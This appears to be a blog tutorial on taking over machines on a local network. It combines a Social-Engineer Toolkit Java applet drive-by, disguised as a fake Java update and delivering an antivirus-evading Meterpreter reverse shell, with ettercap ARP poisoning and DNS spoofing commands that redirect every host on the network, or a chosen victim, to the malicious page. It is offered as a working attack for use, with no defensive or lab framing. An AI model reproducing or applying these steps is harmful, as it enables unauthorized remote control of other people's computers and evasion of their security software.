How to get into local machines using SET + ETTERCAP

Step 1: Setting up the Fake-Page

A. Start SET

 B. Choose Website Attack Attack Vectors by typing 1

c. Choose Java Applet Attack

2D. Here choose Custom Import, so you can use this script to clone the site in which you want to inject the DriveBy,
so that you can edit the content of the cloned page before SET makes evil stuff with it :P. I cloned for example, and after cloning I edited the index.html with changing the JAVA + YOU, DOWNLOAD TODAY part to sth like IMPORTANT JAVA UPDATE. You dont have to use this option, you can simply use the Site-Cloner from SET, too.

E. After choosing your site, you have to choose the Payload. I recommend choice 2 (Windows Reverse_TCP Meterpreter) in here, or if you know that your target has a 64 bit operating system, choose 5 (Windows Reverse_TCP Meterpreter x64), because the x64 one is completely FUD.
F. Now you have to choose the encryption of the Payload , so that it wont get detected by the victims AV. Just choose 16 (Backdoored Executable), which is currently the best.

G. Yet SET is setting up a Metasploit-Listener, which will show you if someone clicked on your Java DriveBy. You MUST keep this window open.
3Step 2:

Use ettercap to redirect slave/s to your fake-site

a. The first thing you have to do, is opening the etter.dns file, which is located in /usr/share/ettercap. Just delete everything in it, and if you want to redirect every site your slave visits, write the following into it:

* A yourip

If you only want to redirect one page, write this:

thesiteyouwanttoredirect A yourip

So at my specific case, the etter.dns file looks like this (Everything gets redirected to my fake page):

* A

b. Running ettercap

After configuring everything, you can now run the following command:

ettercap -T -q -P dns_spoof -M ARP // //

This poisons the whole local network, what means, that every PC in your local machine gets redirected to your fake-page.
If you want to redirect only one single PC, you have to run this command:

ettercap -T -q -P dns_spoof -M ARP /ipofyourvictim/ //

And here is what the parameters actually mean:
-T means Text Interface, so you got no annoying GUI
-q means silent mode, ettercap doesnt display everything it does (which were really annoying)
-P means ettercap hast to use the dns_spoof plugin, which is responsible for the redirecting
-M ARP means Man In The Middle Attack, the whole traffic into your network goes first through your PC


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s